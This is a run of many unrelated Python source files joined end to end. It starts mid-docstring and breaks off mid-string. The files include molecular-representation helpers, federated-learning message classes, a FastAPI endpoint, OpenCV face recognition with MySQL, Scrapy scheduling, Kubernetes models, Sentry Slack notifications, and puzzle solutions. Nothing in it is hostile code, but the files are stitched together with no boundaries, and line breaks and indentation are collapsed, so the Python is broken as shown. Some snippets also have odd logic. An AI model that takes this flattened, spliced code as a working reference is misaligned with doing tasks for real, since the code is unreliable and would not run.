Args: data: Dataset instance rep: ndarray n_total_atoms x dim Returns: cmlkit-style atomic representation """ counts = data.info["atoms_by_system"] offsets = np.zeros(len(counts) + 1, dtype=int) offsets[1::] = np.cumsum(counts) return np.array( [rep[offsets[i] : offsets[i + 1]] for i in range(data.n)], dtype=object ) def in_blocks(data, rep, elems=None): """Arrange local representation in blocks by element. Some representations (ACSF) are returned without taking the central atom type into account. This doesn't work with kernel ridge regression, so we re-arrange the respresentation into zero-padded element blocks, like so: Let (...) be the representation. Let's say we have Z's 1 and 2. Let's say we have one molecule with first atom Z1=1, second Z2=1. Let's say we have dim=2. The result of this function will be [ (Z1=1) (0, 0), (0, 0), (Z2=1) ] I.e. we will have separate blocks for each central atom, filled with zeros where the central atom type is "not in use". Args: data: Dataset instance rep: cmlkit-style atomic representation elems: List of elements to take into account, if not specified will use the ones given in data. Returns: cmlkit-style atomic representation """ if elems is None: n_elems = data.info["total_elements"] elem_idx = {e: i for i, e in enumerate(data.info["elements"])} else: n_elems = len(elems) elem_idx = {e: i for i, e in enumerate(elems)} all_new = [] for i, rep_system in enumerate(rep): dim = len(rep_system[0]) new = np.zeros((len(rep_system), dim * n_elems)) for j, rep_atom in enumerate(rep_system): idx = elem_idx[data.z[i][j]] new[j, idx * dim : (idx + 1) * dim] = rep_atom all_new.append(new) return np.array(all_new, dtype=object) ''' Reshape operation and expr. ''' from .shuffle import shuffle from .ndarray import ndarray import numpy as np def _retile_mapper(array, ex, orig_array): yield ex, orig_array.fetch(ex) def retile(array, tile_hint): ''' Change the tiling of ``array``, while retaining the same shape. 
Args: array(Expr): Array to reshape tile_hint(tuple): New tile shape ''' tiling_type = int(tile_hint[0] == array.shape[0]) new_array = shuffle(ndarray(array.shape, tile_hint=tile_hint).force(), _retile_mapper, kw={'orig_array':array}, shape_hint=array.shape, cost_hint={hash(array):{'%d%d' % (tiling_type, tiling_type): 0, '%d%d' % (1-tiling_type, tiling_type): np.prod(array.shape)}}) return new_array.optimized() class Solution: def plusOne(self, digits: List[int]) -> List[int]: ind = len(digits) - 1 for ind in range(ind,-1,-1): num = digits[ind] if num == 9: digits[ind] = 0 else: digits[ind] = num+1 break else: return [1] + digits return digits#!/usr/bin/env python # vim: set fileencoding=utf-8 : from os import path, remove PROJECT_DIRECTORY: str = path.realpath(path.curdir) def remove_file(filepath: str) -> None: remove(path.join(PROJECT_DIRECTORY, filepath)) if __name__ == "__main__": if "Other" == "{{ cookiecutter.license }}": remove_file("LICENSE") from html import unescape as unescape_chars full_name: str = unescape_chars("{{ cookiecutter.full_name | escape }}") if '"' in full_name: import fileinput import sys with fileinput.input( path.join(PROJECT_DIRECTORY, "docs", "source", "conf.py"), inplace=True, ) as f: for line in f: sys.stdout.write(line.replace(f'"{full_name}"', f"'{full_name}'")) with fileinput.input( path.join(PROJECT_DIRECTORY, "setup.py"), inplace=True, ) as f: for line in f: sys.stdout.write(line.replace(f'"{full_name}"', f"'{full_name}'")) import os from subprocess import check_call, check_output CODE_PATH = os.path.abspath( os.path.join(os.path.dirname(__file__), "source")) ROOT_PATH = os.path.abspath(os.path.join(CODE_PATH, "../..")) def run_python(python_binary, command, extra_args=(), output=False, additional_env={}): """ Run a Python program. Returns output if output=True, in which case stderr will cause error. """ args = [python_binary, os.path.join(CODE_PATH, command)] + list(extra_args) if output: command = check_output else: command = check_call env = os.environ.copy() env.update(additional_env) return command(args, env=env) <reponame>imec-int/federated-learning-lib """ Licensed Materials - Property of IBM Restricted Materials of IBM 20190891 © Copyright IBM Corp. 2021 All Rights Reserved. 
""" """ The Message class is the essential information passing object, it contains information about the data sent from a node, the id_request, and the rank associated with the node in the network """ __author__ = "<NAME>, <NAME>, <NAME>, all ARC team" class Message(object): """ Class to create message for communication between party and aggregator """ # Counter to keep track of the request request_id = 0 def __init__(self, message_type=None, id_request=None, data=None, sender_info=None): """ Initializes an `Message` object :param message_type: type of message :type message_type: `int` :param id_request: id of current request - will be used to track responses :type id_request: `int` :param data: actual data payload :type data: `b[]` """ self.message_type = message_type self.sender_info = sender_info self.data = data if id_request is None: self.id_request = Message.get_request_id() else: self.id_request = id_request return def get_header(self): """ Get header information for the message :param: None :return: information about rank, id_request, and message_type :rtype: `dict` """ return { 'id_request': self.id_request, 'message_type': self.message_type, 'sender_info': self.sender_info } def set_data(self, data): """set data into the message :param data: :type data: `dict` """ # replace this with methods from the data class self.data = data def set_header(self, header): """update message information using contents in header :param header: dictionary with message information :type header: `dict` """ self.id_request = header['id_request'] self.message_type = header['message_type'] self.sender_info = header['sender_info'] def get_data(self): """ Get actual data from the message :param: None :return: data :rtype: `bytes` """ # replace this with methods from the data class return self.data def add_sender_info(self, info): """Information related to source who is sending/initiating this message :param info: Sender information :type info: `dict` """ self.sender_info = info def get_sender_info(self): """Information related to source who sent this message :return: info. Sender information :rtype: `dict` """ return self.sender_info @staticmethod def get_request_id(): Message.request_id = Message.request_id + 1 return Message.request_id def __getstate__(self): print('called') msg_dict = self.__dict__.copy() return msg_dict def __setstate__(self, dict): self.__dict__.update(dict) class ResponseMessage(Message): def __init__(self, req_msg=None, message_type=None, id_request=None, data=None): if req_msg and isinstance(req_msg, Message): super().__init__(message_type=req_msg.message_type, id_request=req_msg.id_request) else: super().__init__(message_type, id_request, data) return from fastapi import APIRouter from pydantic import BaseModel from starlette.requests import Request from Utils import Redis from Utils.Configuration import UPDATE_KEY from Utils.Responses import unauthorized_response router = APIRouter() class Body(BaseModel): key: str type: str @router.post("/update") async def update(request: Request, body: Body): # Disable endpoint by default. 
Re-enable by generating a update key in the config if UPDATE_KEY == None or body.key != UPDATE_KEY: return unauthorized_response await Redis.send_to_bot("update", type=body.type) <gh_stars>0 import cv2 import numpy as np import sys import MySQLdb recognizer = cv2.createLBPHFaceRecognizer() recognizer.load('trainner/trainner.yml') cascadePath = "haarcascade_frontalface_default.xml" faceCascade = cv2.CascadeClassifier(cascadePath); db = MySQLdb.connect (host="127.0.0.1",user="root",passwd="<PASSWORD>",db="imagepro") cursor=db.cursor() cursor2=db.cursor() cursor.execute("select upload from uploads") data=cursor.fetchall() list1=[] for row in data: list1.append(row[0]) print(list1) im2='test/'+list1[0] print(im2) i=0 for index in range(len(list1)): #cam = cv2.VideoCapture(0) font = cv2.cv.InitFont(cv2.cv.CV_FONT_HERSHEY_SIMPLEX, 1, 1, 0, 4, 1) while True: im_name='uploads/'+list1[i] im =cv2.imread(im_name) #ret, im =cam.read() gray=cv2.cvtColor(im,cv2.COLOR_BGR2GRAY) faces=faceCascade.detectMultiScale(gray, 1.2,5) for(x,y,w,h) in faces: cv2.rectangle(im,(x,y),(x+w,y+h),(225,0,0),2) Id, conf = recognizer.predict(gray[y:y+h,x:x+w]) nbr_predicted, conf = recognizer.predict(gray[y:y+h,x:x+w]) cv2.rectangle(im,(x-50,y-50),(x+w+50,y+h+50),(0,225,0),2) cursor2.execute("select name from users where id=%s",(nbr_predicted)) data2=cursor2.fetchall() for row in data2: pred_name=row[0] print(pred_name) cv2.cv.PutText(cv2.cv.fromarray(im),"name="+(pred_name)+"//id="+str(nbr_predicted), (x-50,y),font, 900) #Draw the text #cv2.imshow('im',im) im_out='result/'+list1[i] cv2.imwrite(im_out,im); i=i+1 sys.exit("Done !!") cv2.waitKey(10) cam.release() cv2.destroyAllWindows()<filename>services/Baseline_Approach/cells_lookup_strategies/strategy.py<gh_stars>0 import abc from external_services.dbpedia_lookup_service import DBpedia_Lookup_Service from external_services.wikidata_lookup_service import Wikidata_Lookup_Service from external_services.generic_lookup_service import Generic_Lookup_Service from config import TARGET_KG, DBPEDIA, WIKIDATA from utils.wikidata_util import getWikiID import utils.string_dist as sDist class CellsStrategy(object, metaclass=abc.ABCMeta): def __init__(self, name, priority): # Set name and priority for the strategy self.name = name self.priority = priority # Conditional init of lookup service. 
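# A generic lookup service is always created; the KG-specific service below (DBpedia or Wikidata) is selected from the TARGET_KG config value.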
self.GenericService = Generic_Lookup_Service() if TARGET_KG == DBPEDIA: self.LookupService = DBpedia_Lookup_Service() if TARGET_KG == WIKIDATA: self.LookupService = Wikidata_Lookup_Service() # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Abstract Methods ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ @abc.abstractmethod def process_cell_values(self, cell): """ provide an alternative label to get candidates by """ raise NotImplementedError("process_cell_values must be implemented") # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Common Methods ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ def get_most_similar_mappings(self, mappings, target_val, k=500): """ filter mappings to top-k candidates only, default = 500 """ # shortcircuit, if there are not enough candidates anyways if len(mappings) <= k: return mappings # add distance to each entry target_val = target_val.lower() dist = [{ 'entry': entry, 'dist': min(sDist.levenshtein(label.lower(), target_val) for label in entry['labels']) } for entry in mappings] # sort by distance dist.sort(key=lambda x: x['dist']) # take the first k entries dist = dist[:k] return [el['entry'] for el in dist] def get_mappings(self, cells): """ add candidates to the given cells by using different strategies to expand the alternative labels """ # first pass, collect lookup terms for cells term2cell = {} for cell in cells: # get modified labels terms = self.process_cell_values(cell) # if there are no matches, we dont need to proceed if not terms: continue # make sure we have a list here if isinstance(terms, str): terms = [terms] # make sure all terms are unique terms = list(set(terms)) # only include new search terms that are non-empty terms = [term for term in terms if term.strip()] # only terms that are different from the original values terms = [term for term in terms if term != cell['value']] # if something is left, add it to the queue if terms: for term in terms: if term not in term2cell: term2cell[term] = [] term2cell[term].append(cell) # short-circuit, if there is nothing to resolve if not term2cell: return # run the lookup service for all terms res = self.LookupService.look_for_lst.send([list(term2cell.keys()), None]) # shorten the URIs for vals in res.values(): for el in vals: el['uri'] = getWikiID(el['uri']) # add the results to the respective cells for term, cands in res.items(): if term in term2cell: for cell in term2cell[term]: cell['cand'].extend(cands) # postprocess for cell in cells: # just select the top entries topK = self.get_most_similar_mappings(cell['cand'], cell['value']) cell['cand'] = topK <filename>django_project_lb_02/cookies_demo/views.py from django.shortcuts import render from django.http.response import JsonResponse # Create your views here. 
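# Demo view: sets a cookie on a JsonResponse, reads the cookies sent with the request, then deletes the cookie before returning the response.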
def cookies_demo(request): # 接收参数 response=JsonResponse({'key':'cookies_values'}) # 设置cookies response.set_cookie('LiBin','<EMAIL>',max_age=60) # 读取cookies ret =request.COOKIES print(ret) # 删除 cookies response.delete_cookie('LiBin') return responsefrom aql_testcase import AqlTestCase from aql.utils import CLIOption, CLIConfig, Tempfile class TestCLIConfig(AqlTestCase): def test_cli_config(self): cli_options = ( CLIOption("-l", "--log-level", "log_level", int, None, "", 'NUMBER'), CLIOption("-j", "--jobs", "jobs", int, 1, "", 'NUMBER'), CLIOption("-s", "--size", "size", int, 256, "", 'NUMBER'), CLIOption("-q", "--quite", "quite", bool, False, ""), CLIOption("-v", "--verbose", "verbose", bool, False, ""), ) config = CLIConfig(cli_options, ["-j", "0", "-v", "-s32", "foo", "bv=release", "jobs=10"]) config.set_default('jobs', 3) config.set_default('size', 10) config.set_default('new_size', 2) self.assertEqual(config.jobs, 10) self.assertEqual(config.size, 32) self.assertIs(config.log_level, None) self.assertEqual(config.new_size, 2) self.assertSequenceEqual(config.targets, ['foo']) self.assertEqual(config.bv, 'release') self.assertFalse(config.quite) self.assertTrue(config.verbose) config.set_default('log_level', 1) self.assertEqual(config.log_level, 1) config.log_level = 2 config.set_default('log_level', 0) self.assertEqual(config.log_level, 2) config.jobs = 10 self.assertEqual(config.jobs, 10) config.size = 20 self.assertEqual(config.size, 20) config.new_size = 1 self.assertEqual(config.new_size, 1) config.set_default('new_size', 30) self.assertTrue(config.new_size, 1) # ========================================================== def test_cli_config_file(self): cli_options = ( CLIOption("-j", "--jobs", "jobs", int, 1, "", 'NUMBER'), CLIOption("-s", "--size", "size", int, 256, "", 'NUMBER'), CLIOption("-q", "--quite", "quite", bool, False, ""), CLIOption("-v", "--verbose", "verbose", bool, False, ""), ) with Tempfile() as f: cfg = b""" abc = 123 size = 100 jobs = 4 options['BUILD'] = "DEBUG" targets="test1 test2 test3" """ f.write(cfg) f.flush() config = CLIConfig(cli_options, ["-j", "0", "-v", "foo", "bar", "bv=release", "jobs=10"]) options = {} config.read_file(f, {'options': options}) self.assertRaises(AttributeError, getattr, config, 'options') self.assertEqual(config.abc, 123) self.assertEqual(options['BUILD'], 'DEBUG') self.assertEqual(config.jobs, 10) self.assertEqual(config.size, 100) self.assertEqual(config.targets, "foo, bar") config = CLIConfig(cli_options, ["-j", "0", "-v", "bv=release", "jobs=10"]) options = {} config.read_file(f, {'options': options}) self.assertEqual( config.targets, ["test1", "test2", "test3", "test3"]) cli_values = {'abc': 123, 'jobs': 10, 'verbose': True, 'quite': False, 'bv': 'release', 'size': 100} self.assertEqual(dict(config.items()), cli_values) # -*- coding: utf-8 -*- from dotenv import load_dotenv load_dotenv() import scrapy, schedule, time, logging, requests from scrapy.crawler import CrawlerProcess from spiders.kanui_spider import KanuiSpider from spiders.dafiti_spider import DafitiSpider from spiders.farfetch_spider import FarfetchSpider from spiders.passarela_spider import PassarelaSpider from scrapy.conf import settings recommendationAPIHost = 'http://closetinn-ml-api' ''' Logging ''' # create logger logger = logging.getLogger('closetinn') logger.setLevel(logging.INFO) ''' Scrapy ''' process = CrawlerProcess(settings) # process.crawl(KanuiSpider) process.crawl(DafitiSpider) # process.crawl(FarfetchSpider) # process.crawl(PassarelaSpider) def run(): 
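# Start the registered crawlers, block until crawling finishes, then ask the recommendation API to refresh its database.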
process.start() # the script will block here until the crawling is finished requests.put(recommendationAPIHost + '/updateDatabase') logger.info('---Scheduling Spiders---') schedule.every().day.at('6:00').do(run) while True: schedule.run_pending() time.sleep(1) <filename>kubernetes_py/models/v1/PodAntiAffinity.py #!/usr/bin/env python # -*- coding: utf-8 -*- # # This file is subject to the terms and conditions defined in # file 'LICENSE.md', which is part of this source code package. # from kubernetes_py.models.v1.WeightedPodAffinityTerm import WeightedPodAffinityTerm from kubernetes_py.models.v1.PodAffinityTerm import PodAffinityTerm from kubernetes_py.utils import is_valid_list class PodAntiAffinity(object): """ https://kubernetes.io/docs/api-reference/v1.6/#podantiaffinity-v1-core https://github.com/kubernetes_py/community/blob/master/contributors/design-proposals/podaffinity.md """ def __init__(self, model=None): super(PodAntiAffinity, self).__init__() self._preferred_during_scheduling_ignored_during_execution = [] self._required_during_scheduling_ignored_during_execution = [] if model is not None: self._build_with_model(model) def _build_with_model(self, model=None): if 'preferredDuringSchedulingIgnoredDuringExecution' in model: wpats = [] for x in model['preferredDuringSchedulingIgnoredDuringExecution']: wpat = WeightedPodAffinityTerm(x) wpats.append(wpat) self.preferred_during_scheduling_ignored_during_execution = wpats if 'requiredDuringSchedulingIgnoredDuringExecution' in model: pats = [] for x in model['requiredDuringSchedulingIgnoredDuringExecution']: pat = PodAffinityTerm(x) pats.append(pat) self.required_during_scheduling_ignored_during_execution = pats # ----------------------------------------------------------------- preferredDuringSchedulingIgnoredDuringExecution @property def preferred_during_scheduling_ignored_during_execution(self): return self._preferred_during_scheduling_ignored_during_execution @preferred_during_scheduling_ignored_during_execution.setter def preferred_during_scheduling_ignored_during_execution(self, wpats=None): if not is_valid_list(wpats, WeightedPodAffinityTerm): raise SyntaxError( 'PodAffinity: preferred_during_scheduling_ignored_during_execution: [ {} ] is invald.'.format(wpats)) self._preferred_during_scheduling_ignored_during_execution = wpats # ----------------------------------------------------------------- requiredDuringSchedulingIgnoredDuringExecution @property def required_during_scheduling_ignored_during_execution(self): return self._required_during_scheduling_ignored_during_execution @required_during_scheduling_ignored_during_execution.setter def required_during_scheduling_ignored_during_execution(self, pats=None): if not is_valid_list(pats, PodAffinityTerm): raise SyntaxError( 'PodAffinity: required_during_scheduling_ignored_during_execution: [ {} ] is invald.'.format(pats)) self._required_during_scheduling_ignored_during_execution = pats # ------------------------------------------------------------------------------------- serialize def serialize(self): data = {} if self.preferred_during_scheduling_ignored_during_execution: wpats = [] for x in self.preferred_during_scheduling_ignored_during_execution: wpat = x.serialize() wpats.append(wpat) data['preferredDuringSchedulingIgnoredDuringExecution'] = wpats if self.required_during_scheduling_ignored_during_execution: pats = [] for x in self.required_during_scheduling_ignored_during_execution: pat = x.serialize() pats.append(pat) data['requiredDuringSchedulingIgnoredDuringExecution'] = 
pats return data <reponame>caro-alvim/EstacaoMet_IoT from wifi_lib import conecta import urequests import dht import machine import time d = dht.DHT11(machine.Pin(4)) r = machine.Pin(2, machine.Pin.OUT) station = conecta("NOME_SUA_REDE", "SUA_SENHA") if station.isconnected(): print("Conectado") while True: d.measure() print("Temp={} Umid={}".format(d.temperature(), d.humidity())) if d.temperature() >=31 or d.humidity() >=70: r.value(1) siteAcessado = urequests.get("http://api.thingspeak.com/update?api_key=CHAVEDOTHINKSPEAK&field1={}&field2={}".format(d.temperature(),d.humidity())) print(siteAcessado.text) print("Envio concluído") else: print("Condições mínimas não alcançadas") r.value(0) time.sleep(20) <gh_stars>1-10 # -*- coding: utf-8 -*- """\ This is a python port of "Goose" orignialy licensed to Gravity.com under one or more contributor license agreements. See the NOTICE file distributed with this work for additional information regarding copyright ownership. Python port was written by <NAME>ae Gravity.com licenses this file to you under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. """ import re from goose.extractors import BaseExtractor import goose.text class LinkItem(dict): def __init__(self, url, text): self["url"] = url self["text"] = text @property def url(self): return self["url"] @property def text(self): return self["text"] def __repr__(self): return "(url={0}, text={1})".format( self.url.encode("utf-8", 'ignore'), self.text.encode("utf-8", 'ignore')) class LinksExtractor(BaseExtractor): BAD_HTML_LINK_NAME = re.compile(r'/style/') def extract(self): links = [] items = self.parser.getElementsByTag(self.article.top_node, 'a') for i in items: attr = self.parser.getAttribute(i, 'href') if attr: links.append(attr) return links def extract_html_links(self): links = [] items = self.parser.getElementsByTag(self.article.doc, 'a') for i in items: attr = self.parser.getAttribute(i, 'href') if not attr: continue text = self.parser.getText(i).strip() if not text or len(text.split(' ')) < 3: continue if self.BAD_HTML_LINK_NAME.search(attr): continue attr = self.get_clean_href(attr) if not attr: continue links.append(LinkItem(attr, text)) return links READ_MORE_RE = re.compile(r"read.*more", flags=re.IGNORECASE) def extract_read_more(self): items = self.parser.getElementsByTag(self.article.doc, "a") for link in items: text = self.parser.getText(link) if not self.READ_MORE_RE.search(text): continue href = self.parser.getAttribute(link, 'href') if href: return href return None def get_clean_href(self, href): if href[0] == "/" and href[1:2] != "/":#exlcude //ww.abc.com type names if self.article.site_domain and self.article.site_domain[-1] == '/': href = href[1:] href = self.article.site_domain + href else: link_site_domain = goose.text.get_site_domain(href) if self.article.site_domain and link_site_domain != self.article.site_domain: return None last_seg = href.split("/")[-1] if not last_seg or last_seg[0] == "#": return None return href <gh_stars>0 from __future__ import absolute_import from django import forms from django.utils.translation 
import ugettext_lazy as _ from sentry import http from sentry.rules.actions.base import EventAction from sentry.utils import metrics, json from sentry.models import Integration from .utils import build_attachment class SlackNotifyServiceForm(forms.Form): team = forms.ChoiceField(choices=(), widget=forms.Select( attrs={'style': 'width:150px'}, )) channel = forms.CharField(widget=forms.TextInput( attrs={'placeholder': 'i.e #critical-errors'}, )) def __init__(self, *args, **kwargs): # NOTE: Team maps directly to the integration ID team_list = [(i.id, i.name) for i in kwargs.pop('integrations')] self.channel_transformer = kwargs.pop('channel_transformer') super(SlackNotifyServiceForm, self).__init__(*args, **kwargs) if team_list: self.fields['team'].initial = team_list[0][0] self.fields['team'].choices = team_list self.fields['team'].widget.choices = self.fields['team'].choices def clean_channel(self): team = self.cleaned_data.get('team') channel = self.cleaned_data.get('channel', '').lstrip('#') channel_id = self.channel_transformer(team, channel) if channel_id is None and team is not None: params = { 'channel': channel, 'team': dict(self.fields['team'].choices).get(int(team)), } raise forms.ValidationError( _('The #%(channel)s channel does not exist in the %(team)s Slack team.'), code='invalid', params=params, ) return channel class SlackNotifyServiceAction(EventAction): form_cls = SlackNotifyServiceForm label = u'Send a notification to the Slack {team} team in {channel}' def is_enabled(self): return self.get_integrations().exists() def after(self, event, state): integration_id = self.get_option('team') channel = self.get_option('channel') integration = Integration.objects.get( provider='slack', organizations=self.project.organization, id=integration_id ) def send_notification(event, futures): attachment = build_attachment(event.group, event=event) payload = { 'token': integration.metadata['access_token'], 'channel': channel, 'attachments': json.dumps([attachment]), } session = http.build_session() resp = session.post('https://slack.com/api/chat.postMessage', data=payload) resp.raise_for_status() resp = resp.json() if not resp.get('ok'): self.logger.info('rule.fail.slack_post', extra={'error': resp.get('error')}) metrics.incr('notifications.sent', instance='slack.notification') yield self.future(send_notification) def render_label(self): try: integration_name = Integration.objects.get( provider='slack', organizations=self.project.organization, id=self.data['team'], ).name except Integration.DoesNotExist: integration_name = '[removed]' return self.label.format( team=integration_name, channel='#' + self.data['channel'], ) def get_integrations(self): return Integration.objects.filter( provider='slack', organizations=self.project.organization, ) def get_channel_id(self, integration_id, channel_name): try: integration = Integration.objects.get( provider='slack', organizations=self.project.organization, id=integration_id, ) except Integration.DoesNotExist: return None payload = { 'token': integration.metadata['access_token'], 'exclude_archived': False, 'exclude_members': True, } session = http.build_session() resp = session.get('https://slack.com/api/channels.list', params=payload) resp.raise_for_status() resp = resp.json() if not resp.get('ok'): self.logger.info('rule.slack.channel_list_failed', extra={'error': resp.get('error')}) return None return {c['name']: c['id'] for c in resp['channels']}.get(channel_name) def get_form_instance(self): return self.form_cls( self.data, 
integrations=self.get_integrations(), channel_transformer=self.get_channel_id, ) def knapsack(P, W, K): n = len(P) F = [[0] * (K + 1) for i in range(n + 1)] for i in range(1, n + 1): for k in range(1, K + 1): if k >= W[i]: F[i][k] = max(F[i - 1][k], F[i - 1][k - W[i]] + P[i]) else: F[i][k] = F[i - 1][k] k = K ans = [] for i in range(n, 0, -1): if F[i][k] != F[i - 1][k]: ans.append(i) k -= W[i] return ans if __name__ == '__main__': print(knapsack([0, 1, 6, 4, 7, 6], [0, 3, 4, 5, 8, 9], 13)) <filename>day_05/day_05.py # --- Day 5: Hydrothermal Venture --- # # You come across a field of hydrothermal vents on the ocean floor! # These vents constantly produce large, opaque clouds, so it would be best to avoid them if possible. # Each line of vents is given as a line segment in the format x1,y1 -> x2,y2 # where x1,y1 are the coordinates of one end the line segment and x2,y2 are the coordinates of the other end. # These line segments include the points at both ends. In other words: # An entry like 1,1 -> 1,3 covers points 1,1, 1,2, and 1,3. # # --- Part 1 --- # To avoid the most dangerous areas, you need to determine the number of points where at least two lines overlap. # Consider only horizontal and vertical lines. At how many points do at least two lines overlap? import numpy as np test_coordinates = np.array([[[int(z) for z in y.split(",")] for y in x.split(" -> ")] for x in open('resources/test_coordinates', 'r').readlines()], dtype=int) val_coordinates = np.array([[[int(z) for z in y.split(",")] for y in x.split(" -> ")] for x in open('resources/val_coordinates', 'r').readlines()], dtype=int) vent_grid = np.zeros((999, 999)) def find_overlaps(coordinates, grid): for pair in coordinates: x1, y1, x2, y2 = pair[0][0], pair[0][1], pair[1][0], pair[1][1] if x1 == x2: if y1 < y2: move = 1 else: move = -1 for increment in range(y1, y2 + move, move): grid[x1, increment] += 1 elif y1 == y2: if x1 < x2: move = 1 else: move = -1 for increment in range(x1, x2 + move, move): grid[increment, y1] += 1 return np.sum(np.where(grid > 1, 1, 0)) # TODO: Check why val output has offset of 5 # TODO: Work on task 2 print(find_overlaps(test_coordinates, vent_grid)) print(find_overlaps(val_coordinates, vent_grid)) # -*- coding: utf-8 -*- import tornado.escape def trim(c, text): return text.strip() def nl2br(c, text, escape=True, break_tag='<br />'): if not text: return '' text = tornado.escape.xhtml_escape(text) if escape else text return text.replace('\r\n', break_tag).replace('\r', break_tag).replace('\n', break_tag) def truncate(c, text, length, ellipsis='..'): if len(text) > length: return '%s%s' % (text[0:length], ellipsis) return text def yyyymmdd(c, datetime=None, timestamp=None, ms=False, concat='.'): return c.helper.datetime.date.yyyymmdd(datetime=datetime, timestamp=timestamp, ms=ms, concat=concat) def mmdd(c, datetime=None, timestamp=None, ms=False, concat='.'): return c.helper.datetime.date.mmdd(datetime=datetime, timestamp=timestamp, ms=ms, concat=concat) def hhiiss(c, datetime=None, timestamp=None, ms=False, concat=':'): return c.helper.datetime.time.hhiiss(datetime=datetime, timestamp=timestamp, ms=ms, concat=concat) def hhii(c, datetime=None, timestamp=None, ms=False, concat=':'): return c.helper.datetime.time.hhii(datetime=datetime, timestamp=timestamp, ms=ms, concat=concat) def weekday(c, datetime=None, timestamp=None, ms=False, isoweekday=True): return c.helper.datetime.date.weekday(datetime=datetime, timestamp=timestamp, ms=ms, isoweekday=isoweekday) def request_uri(c, with_queries=True, 
query_quote=False, s=False, d=' ', p='_'): r = ('%s%s' % (d, p)).join(c.request.uri.split('/')).strip() if s else c.request.uri r = prefixize(c, r) r = r if with_queries else r.split('?')[0:1][0] return c.helper.web.url.quote(r) if query_quote else r def m17n(c, m17n_lang=None): if not m17n_lang: m17n_lang = c.get_cookie('__m17n__') return c.m17n.get(m17n_lang) def get(c, arg, default=None): return c.get_argument(arg, default=default) def number_format(c, val): return c.helper.numeric.number_format(val) def prefixize(c, static_url, query=None, combine_request_query=False, prefix=None, prefix_alternative=None): if combine_request_query: uri = c.helper.web.url.parse(c) if query and isinstance(query, dict): query = dict(uri.query, **query) elif not query: query = uri.query if query and isinstance(query, dict): uri = c.helper.web.url.parse(static_url) for k in query.keys(): v = query[k] if v is None and k in uri.query: del uri.query[k] elif v is not None: uri.query[k] = v static_url = c.helper.web.url.build(uri.path, uri.query) if prefix or 'X-Proxy-Prefix' in c.request.headers: p = prefix_alternative or prefix or c.request.headers['X-Proxy-Prefix'].strip() p = p[:-1] if p.endswith('/') else p if static_url.startswith(p): return static_url[len(p):] or '/' return static_url else: return static_url <reponame>Dikshuy/Autumn-of-Automation<gh_stars>1-10 import imutils import cv2 class ShapeDetector: def __init__(self): pass def detect(self, c): shape = "unidentified" peri = cv2.arcLength(c, True) approx = cv2.approxPolyDP(c, 0.04 * peri, True) if len(approx) == 3: shape = "triangle" elif len(approx) == 4: (x, y, w, h) = cv2.boundingRect(approx) aspect_ratio = w / float(h) if aspect_ratio >= 0.95 and aspect_ratio <= 1.05: #this is because approxPolyDP has a variance of 1-5% shape = "square" elif aspect_ratio >= 0.712 and aspect_ratio <= 0.814: shape = "rhombus" else: shape = "rectangle" else: (x,y),radius = cv2.minEnclosingCircle(approx) center = (int(x),int(y)) radius = int(radius) if len(approx) == 8: shape = "circle" else: shape = "oval" return shape image = cv2.imread("img.jpg") resized = imutils.resize(image, width=300) ratio = image.shape[0] / float(resized.shape[0]) gray = cv2.cvtColor(resized, cv2.COLOR_BGR2GRAY) blurred = cv2.GaussianBlur(gray, (5, 5), 0) thresh = cv2.threshold(blurred, 150, 255, cv2.THRESH_BINARY)[1] cnts = cv2.findContours(thresh.copy(), cv2.RETR_LIST , cv2.CHAIN_APPROX_SIMPLE) cnts = imutils.grab_contours(cnts) sd = ShapeDetector() for c in cnts: M = cv2.moments(c) cX = int((M["m10"] / M["m00"]) * ratio) cY = int((M["m01"] / M["m00"]) * ratio) shape = sd.detect(c) c = c.astype("float") c *= ratio c = c.astype("int") cv2.drawContours(image, [c], -1, (0, 255, 0), 2) cv2.putText(image, shape, (cX, cY), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0, 0), 2) cv2.imshow("Image", image) cv2.waitKey(0) cv2.destroyAllWindows()def compute(m , y1, x1, y2, x2 ): w = x2-x1+1 h = y2-y1+1 if w==1 or h==1: return 1 gmax = 1 new_m = [[1 for i in range(w)] for j in range(h)] for i in range(y1+1,y2+1): for j in range(x1+1, x2+1): if(m[i-1][j-1]<=m[i-1][j] and m[i-1][j-1]<=m[i][j-1] and m[i-1][j]<=m[i][j] and m[i][j-1]<m[i][j]): new_m[i-y1][j-x1] = min(new_m[i-1-y1][j-1-x1],new_m[i-1-y1][j-x1],new_m[i-y1][j-1-x1])+1 if(new_m[i-y1][j-x1]>gmax): gmax = new_m[i-y1][j-x1] return gmax def main(): h,w = list(map(int, input().split())) m = [ '' for j in range(h)] for i in range(h): m[i] = input() n = int(input()) results = [] for i in range(n): x1,y1,x2,y2 = list(map(int,input().split())) 
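# queries arrive 1-based; shift to 0-based indices before running the DP on the requested sub-rectangle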
results.append(compute(m,x1-1,y1-1,x2-1,y2-1)) print() for i in results : print(i) if __name__ == '__main__': main() <gh_stars>0 #04 - Utilizando funções e listas faça um programa que receba uma data no formato DD/MM/AAAA e devolva uma string no formato DD de mesPorExtenso de AAAA. Opcional: valide a data e retorne 'data inválida' caso a data seja inválida. from os import system def mesPorExtenso(): system('cls') # limpa o prompt de comando dia = int(input('Digite o dia[DD]: ')) # usuário digita um dia válido [1 - 31] mes = int(input('Digite o mês[MM]: ')) # usuário digita um mes válido [1 - 12] ano = int(input('Digite o ano[AAAA]: ')) # usuário digita um ano válido meses = ['Janeiro', 'Fevereiro', 'Março', 'Abril', 'Maio', 'Junho', 'Julho', 'Agosto', 'Setembro', 'Outubro', 'Novembro', 'Dezembro'] # lista com todos os meses, por extenso for i, m in enumerate(meses): # i = índice , m = meses por extenso if mes == i +1: # se o mes for igual a i + 1... mes = m # mes recebe o mes por extenso correspondente ao seu i if dia > 29 and mes == 'Fevereiro': # se o dia for maior que 29 e o mes for fevereiro... print('\nData Inválida! Fevereiro só pode ter até 29 dias!\n') elif dia > 31: # se o dia for maior que 31 ... print('\nData Inválida! Os meses só podem ter até 31 dias (exceto fevereiro)\n') elif mes not in meses: # se o mes não estiver dentro da lista de meses... print('\nData inválida! Meses só 